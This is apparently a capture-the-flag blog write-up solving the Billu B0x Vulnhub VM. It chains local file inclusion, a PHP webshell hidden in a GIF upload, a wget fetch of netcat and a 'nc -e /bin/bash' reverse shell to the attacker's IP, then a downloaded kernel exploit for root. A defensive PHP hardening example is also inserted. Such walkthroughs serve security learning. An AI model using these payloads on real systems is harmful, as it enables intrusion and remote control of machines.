Mr_H4sh

Infosec, CTF and more

Billu B0x Solution

In this post I’m going to show you how to solve the Billu B0x VM provided by Manish Kishan Tanwar.

You can find the VM at this link

The goal of the VM is to gain root access on the machine. I found 2 ways to get into the machine.

Attacker: 192.168.212.1 / 192.168.212.101
Victim: 192.168.212.102

I run nmap against the victim and find ports 22 and 80 open.

Since port 80 is open, I visit the URL http://192.168.212.102/ and find a login form with the following message:

Show me your SQLI skills 
Username:
Password: 

I spend a bit of time trying to find a SQL injection, and in the meantime I run dirb, which turns up some interesting URLs.

-------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May  1 17:16:01 2017
URL_BASE: http://192.168.212.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://192.168.212.102/ ----
+ http://192.168.212.102/add (CODE:200|SIZE:307)
+ http://192.168.212.102/c (CODE:200|SIZE:1)
+ http://192.168.212.102/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.212.102/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.212.102/images/
+ http://192.168.212.102/in (CODE:200|SIZE:47559)
+ http://192.168.212.102/index (CODE:200|SIZE:3267)
+ http://192.168.212.102/index.php (CODE:200|SIZE:3267)
+ http://192.168.212.102/panel (CODE:302|SIZE:2469)
+ http://192.168.212.102/server-status (CODE:403|SIZE:296)
+ http://192.168.212.102/show (CODE:200|SIZE:1)
+ http://192.168.212.102/test (CODE:200|SIZE:72)

---- Entering directory: http://192.168.212.102/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Mon May  1 17:16:24 2017
DOWNLOADED: 4612 - FOUND: 11

I check the URL http://192.168.212.102/test.php, and this is what I get:

'file' parameter is empty. Please provide file path in 'file' parameter

With a GET request I only get that message back, so I write a small HTML page to send a POST request to the URL and see what happens:

<form action="http://192.168.212.102/test.php" method="POST">
File Path: <input type="text" name="file"/>
<input type="submit" name="submit" value="submit"/>
</form>

I open the HTML page, enter /etc/passwd as the file path and submit, and the browser downloads a passwd file with the following content:

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash

I get the source code for various pages (c.php, test.php, panel.php, show.php, add.php).

The file c.php has the following content:

<?php
#header( 'Z-Powered-By:its chutiyapa xD' );
header('X-Frame-Options: SAMEORIGIN');
header( 'Server:testing only' );
header( 'X-Powered-By:testing only' );

ini_set( 'session.cookie_httponly', 1 );

$conn = mysqli_connect("127.0.0.1","billu","b0x_billu","ica_lab");

// Check connection
if (mysqli_connect_errno())
  {
  echo "connection failed ->  " . mysqli_connect_error();
  }

?>

Unfortunately these credentials don't give access to either SSH or the web application.

I can see from the panel that a logged-in user has 2 functions available: add and show.

I see that the page show.php has the following source code:

<?php
include('c.php');

if(isset($_POST['continue']))
{
    $run='select * from users ';
    $result = mysqli_query($conn, $run);
    if (mysqli_num_rows($result) > 0) {
        echo "<table width=90% ><tr><td>ID</td><td>User</td><td>Address</td><td>Image</td></tr>";
        while($row = mysqli_fetch_assoc($result))
        {
            echo '<tr><td>'.$row['id'].'</td><td>'.htmlspecialchars ($row['name'],ENT_COMPAT).'</td><td>'.htmlspecialchars ($row['address'],ENT_COMPAT).'</td><td><img src="uploaded_images/'.htmlspecialchars ($row['image'],ENT_COMPAT).'" height=90px width=100px></td></tr>';
        }
        echo "</table>";
    }
}

?>

So, using Burp, I change the body of the request from POST to GET when visiting http://192.168.212.102/show.php, and I see that there are 2 users in the system, “Jack” and “Capitain Barbarossa”, followed by some images.

I check the source code of add.php and get lucky. This is its content:

<?php

echo '<form  method="post" enctype="multipart/form-data">
    Select image to upload:
    <input type="file" name=image>
    <input type=text name=name value="name">
    <input type=text name=address value="address">
    <input type=text name=id value=1337 >
    <input type="submit" value="upload" name="upload">
</form>';

?>

Unfortunately this doesn't work: even if I post to panel.php, I need to be logged in.

I get back to the URL scan and try again with a bigger wordlist, and this is what I get:

$ dirb http://192.168.212.102 /usr/share/dirb/wordlists/big.txt | tee /tmp/billu_b0x.txt

-----------------
DIRB v2.22
By The Dark Raver
-----------------

START_TIME: Mon May  1 18:20:02 2017
URL_BASE: http://192.168.212.102/
WORDLIST_FILES: /usr/share/dirb/wordlists/big.txt

-----------------

GENERATED WORDS: 20458

---- Scanning URL: http://192.168.212.102/ ----
+ http://192.168.212.102/add (CODE:200|SIZE:307)
+ http://192.168.212.102/c (CODE:200|SIZE:1)
+ http://192.168.212.102/cgi-bin/ (CODE:403|SIZE:291)
+ http://192.168.212.102/head (CODE:200|SIZE:2793)
==> DIRECTORY: http://192.168.212.102/images/
+ http://192.168.212.102/in (CODE:200|SIZE:47559)
+ http://192.168.212.102/index (CODE:200|SIZE:3267)
+ http://192.168.212.102/panel (CODE:302|SIZE:2469)
==> DIRECTORY: http://192.168.212.102/phpmy/
+ http://192.168.212.102/server-status (CODE:403|SIZE:296)
+ http://192.168.212.102/show (CODE:200|SIZE:1)
+ http://192.168.212.102/test (CODE:200|SIZE:72)
==> DIRECTORY: http://192.168.212.102/uploaded_images/

[...]

I see that phpMyAdmin is installed on the system, reachable at the URL http://192.168.212.102/phpmy/. I also get more information about the system from the URL http://192.168.212.102/in, a page that calls phpinfo() and shows the system's configuration.

This looks a bit clearer. At this point I log in to phpMyAdmin using the credentials from c.php: billu:b0x_billu.

I try to read some files and to write a PHP backdoor into one of the web folders, but nothing works. AppArmor must be running on the system.

I check the auth table in the ica_lab database and find the only user in it: biLLu:hEx_it.

These credentials work like magic on the web application login. I add a new user using the panel and try to upload a malicious file in order to get a reverse shell.

I prepend image header bytes to a file and append some PHP code to see if the server executes it. This is the content of my malicious image:

$ echo 'FFD8FFEo' | xxd -r -p > my_image.gif
$ echo '<?php phpinfo(); ?>' >> my_image.gif
$ cat my_image.gif
ÿOÿ<?php phpinfo(); ?>

After various attempts, I can't get the uploaded file executed on the server through the upload functionality alone, so I move on for now.

I look for a vulnerability in the installed phpMyAdmin version and come across this exploit, https://www.exploit-db.com/exploits/17514/, which doesn't match the version on the VM but points me to the system's config file.

I visit http://192.168.212.102/phpmy/setup/config.php and see that it could generate a brand new config.inc.php file. At this point I use test.php (http://192.168.212.102/test.php) to read the file /var/www/phpmy/config.inc.php, and this is its content:

<?php

/* Servers configuration */
$i = 0;

/* Server: localhost [1] */
$i++;
$cfg['Servers'][$i]['verbose'] = 'localhost';
$cfg['Servers'][$i]['host'] = 'localhost';
$cfg['Servers'][$i]['port'] = '';
$cfg['Servers'][$i]['socket'] = '';
$cfg['Servers'][$i]['connect_type'] = 'tcp';
$cfg['Servers'][$i]['extension'] = 'mysqli';
$cfg['Servers'][$i]['auth_type'] = 'cookie';
$cfg['Servers'][$i]['user'] = 'root';
$cfg['Servers'][$i]['password'] = 'roottoor';
$cfg['Servers'][$i]['AllowNoPassword'] = true;

/* End of servers configuration */

$cfg['DefaultLang'] = 'en-utf-8';
$cfg['ServerDefault'] = 1;
$cfg['UploadDir'] = '';
$cfg['SaveDir'] = '';


/* rajk - for blobstreaming */
$cfg['Servers'][$i]['bs_garbage_threshold'] = 50;
$cfg['Servers'][$i]['bs_repository_threshold'] = '32M';
$cfg['Servers'][$i]['bs_temp_blob_timeout'] = 600;
$cfg['Servers'][$i]['bs_temp_log_threshold'] = '32M';


?>

I try the credentials root:roottoor to log in to phpMyAdmin as root, but it doesn't work. So I try the same credentials over SSH, and it works.

$ ssh root@192.168.212.102
Could not create directory '/home/anthony/.ssh'.
The authenticity of host '192.168.212.102 (192.168.212.102)' can't be established.
RSA key fingerprint is 88:31:0c:78:98:80:ef:33:fa:26:22:ed:d0:9b:ba:f8.
Are you sure you want to continue connecting (yes/no)? yes
Failed to add the host to the list of known hosts (/home/anthony/.ssh/known_hosts).
root@192.168.212.102's password:
Welcome to Ubuntu 12.04.5 LTS (GNU/Linux 3.13.0-32-generic i686)

 * Documentation:  https://help.ubuntu.com/

  System information as of Tue May  2 02:00:22 IST 2017

  System load:  0.06              Processes:           77
  Usage of /:   12.1% of 9.61GB   Users logged in:     0
  Memory usage: 8%                IP address for eth0: 192.168.212.102
  Swap usage:   0%

  Graph this data and manage this system at:
    https://landscape.canonical.com/

New release '14.04.5 LTS' available.
Run 'do-release-upgrade' to upgrade to it.


Your Hardware Enablement Stack (HWE) is supported until April 2017.

Last login: Tue May  2 00:53:22 2017 from 192.168.212.1
root@indishell:~# whoami
root
root@indishell:~# id
uid=0(root) gid=0(root) groups=0(root)
root@indishell:~#

Uhm… I check the Vulnhub page for the VM again, and this is what the description says:

This virtual machine has a medium difficulty level with tricks.

One needs to break into the VM using the web application and from there escalate privileges to gain root access.

OK, I pretend I don't have root access and try harder through the web app.

I spend more time trying to find what I'm missing in the web app, and I find out that the load parameter of panel.php has an LFI vulnerability:

POST /panel.php HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 42
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../etc/passwd&continue=continue


*** OUTPUT ***
[...]

<select name=load>
    <option value="show">Show Users</option>
	<option value="add">Add User</option>
</select> 

 &nbsp<input type=submit name=continue value="continue"></form><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
syslog:x:101:103::/home/syslog:/bin/false
mysql:x:102:105:MySQL Server,,,:/nonexistent:/bin/false
messagebus:x:103:106::/var/run/dbus:/bin/false
whoopsie:x:104:107::/nonexistent:/bin/false
landscape:x:105:110::/var/lib/landscape:/bin/false
sshd:x:106:65534::/var/run/sshd:/usr/sbin/nologin
ica:x:1000:1000:ica,,,:/home/ica:/bin/bash

This could be good: I already found a way to upload an image containing PHP code, and this could be the way to execute it.

The following request shows me the output of the phpinfo() call inside the file /var/www/uploaded_images/my_image.gif:

POST /panel.php HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 68
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../var/www/uploaded_images/my_image.gif&continue=continue

So, at this point I write another gif with a PHP backdoor:

$ echo 'FFD8FFEo' | xxd -r -p > shell.gif
$ echo '<?php passthru($_GET['cmd']); ?>' >> shell.gif
$ cat shell.gif
ÿOÿ<?php passthru($_GET[cmd]); ?>

I upload the image and repeat the same request, this time passing the cmd parameter in the query string, and this is what I get:

POST /panel.php?cmd=whoami HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../var/www/uploaded_images/shell.gif&continue=continue

*** OUTPUT ***
[...]
Welcome to billu b0x <form method=post style="margin: 10px 0px 10px 95%;"><input type=submit name=lg value=Logout></form><hr><br><form method=post>

<select name=load>
    <option value="show">Show Users</option>
	<option value="add">Add User</option>
</select> 

 &nbsp<input type=submit name=continue value="continue"></form><br><br>���www-data
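As an added example (not code from the VM or its author), here is how the two pieces of the chain above would be hardened in PHP: the panel.php include driven by the load parameter is replaced with a fixed map of the two menu actions, and the add.php upload handler validates and renames what it stores. It assumes the VM's layout (show.php and add.php next to panel.php, uploads under uploaded_images/); the function names are mine.

```php
<?php
// Added example, not the VM's code: hardened replacements for the two pieces
// of the chain above. Assumes the VM's layout (show.php and add.php next to
// panel.php, uploads under uploaded_images/); function names are assumptions.
declare(strict_types=1);

// ---- panel.php ----
// The LFI came from include() on the user-supplied "load" value. Only the two
// menu actions exist, so map them to fixed files and refuse everything else.
const PANEL_ACTIONS = [
    'show' => __DIR__ . '/show.php',
    'add'  => __DIR__ . '/add.php',
];

// Returns the file to include for a menu action, or null for anything else.
// "../../../etc/passwd" or "../uploaded_images/x.gif" never reach include().
function panelTarget(string $load): ?string
{
    return PANEL_ACTIONS[$load] ?? null;
}

// In panel.php, after the login check:
//   $target = panelTarget((string) ($_POST['load'] ?? ''));
//   if ($target === null) { http_response_code(400); exit; }
//   include $target;

// ---- add.php ----
// The upload stored the client's file name and content unchanged, so a file
// with an image signature followed by PHP code sat in uploaded_images/ until
// the LFI pulled it into include(). Decode the image, take the extension from
// the detected type (never from the client name) and store under a random name.
// This is defence in depth: the allowlist above is what stops execution, since
// a valid image can still carry PHP in a comment or EXIF segment and pass here.
function storeImage(string $tmpPath, string $destDir): ?string
{
    $allowed = [IMAGETYPE_GIF => 'gif', IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png'];
    $info = @getimagesize($tmpPath);       // false when the data is not a decodable image
    if ($info === false || !isset($allowed[$info[2]])) {
        return null;
    }
    $name = bin2hex(random_bytes(16)) . '.' . $allowed[$info[2]];
    if (!move_uploaded_file($tmpPath, $destDir . '/' . $name)) {
        return null;
    }
    return $name;                          // store this in users.image, not the client name
}

// In add.php, after the login check:
//   if (isset($_POST['upload']) && $_FILES['image']['error'] === UPLOAD_ERR_OK) {
//       $stored = storeImage($_FILES['image']['tmp_name'], __DIR__ . '/uploaded_images');
//       if ($stored === null) { http_response_code(400); exit('not a supported image'); }
//   }
```

On Apache with mod_php, an .htaccess containing `php_flag engine off` inside uploaded_images/ additionally keeps that directory from ever executing PHP when a file is requested directly.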

OK, I'm www-data. Now I get a reverse shell using the same method, and I'm in.

First, I see that the version of netcat installed on the machine doesn't support command execution (-e), so I download my own copy from my machine to the victim using the following request:

POST /panel.php?cmd=/usr/bin/wget+http://192.168.212.101/nc+-O+/tmp/nc HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../var/www/uploaded_images/shell.gif&continue=continue

I double-check that it has been downloaded and give the file /tmp/nc execute permissions.

Once this is done, I set my machine listening on port 4444 and use the following request to get a reverse shell:

POST /panel.php?cmd=/tmp/nc+192.168.212.101+4444+-e+/bin/bash HTTP/1.1
Host: 192.168.212.102
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:53.0) Gecko/20100101 Firefox/53.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-GB,en;q=0.5
Content-Type: application/x-www-form-urlencoded
Content-Length: 65
Referer: http://192.168.212.102/panel.php
Cookie: PHPSESSID=miq2p5g3srk4p4u6aa55vac9i6
Connection: close
Upgrade-Insecure-Requests: 1

load=../../../var/www/uploaded_images/shell.gif&continue=continue

*** OUTPUT ***
# nc -lnvp 4444
listening on [any] 4444 ...
connect to [192.168.212.101] from (UNKNOWN) [192.168.212.102] 55738
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whoami
www-data

Now that I’m in, I need to escalate privileges.

The machine runs Ubuntu 12.04.5 with kernel 3.13.0, which is quite out of date:

uname -a
Linux indishell 3.13.0-32-generic #57~precise1-Ubuntu SMP Tue Jul 15 03:50:54 UTC 2014 i686 i686 i386 GNU/Linux
cat /etc/*-release
DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=12.04
DISTRIB_CODENAME=precise
DISTRIB_DESCRIPTION="Ubuntu 12.04.5 LTS"
NAME="Ubuntu"
VERSION="12.04.5 LTS, Precise Pangolin"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu precise (12.04.5 LTS)"
VERSION_ID="12.04"

I download the exploit available at https://www.exploit-db.com/exploits/37292/, compile it on the machine and run it:

wget http://192.168.212.101/37292.c
gcc -o exploit 37292.c
ls -la
total 56
drwxrwxrwt  2 root     root      4096 May  2 02:52 .
drwxr-xr-x 22 root     root      4096 Mar 18 23:07 ..
-rw-r--r--  1 www-data www-data  5123 May  2 02:52 37292.c
-rwxr-xr-x  1 www-data www-data 12016 May  2 02:52 exploit
-rwxrwxrwx  1 www-data www-data 26216 May  2 02:40 nc
./exploit
id
uid=0(root) gid=0(root) groups=0(root),33(www-data)

The exploit works, and I'm now root (again).

Nice VM, all web based.

Thank you to Manish Kishan Tanwar for the VM and Vulnhub for hosting it.
